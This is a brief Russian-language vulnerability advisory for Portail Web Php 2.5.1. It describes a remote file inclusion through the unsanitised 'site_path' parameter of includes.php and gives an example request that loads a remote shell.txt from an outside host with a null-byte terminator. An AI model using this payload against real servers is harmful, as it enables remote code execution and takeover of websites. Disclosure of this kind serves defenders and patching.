Программа: Portail Web Php 2.5.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «site_path» сценарием includes.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

/includes/includes.php?site_path=http://site.com/shell.txt?%00



Оставить мнение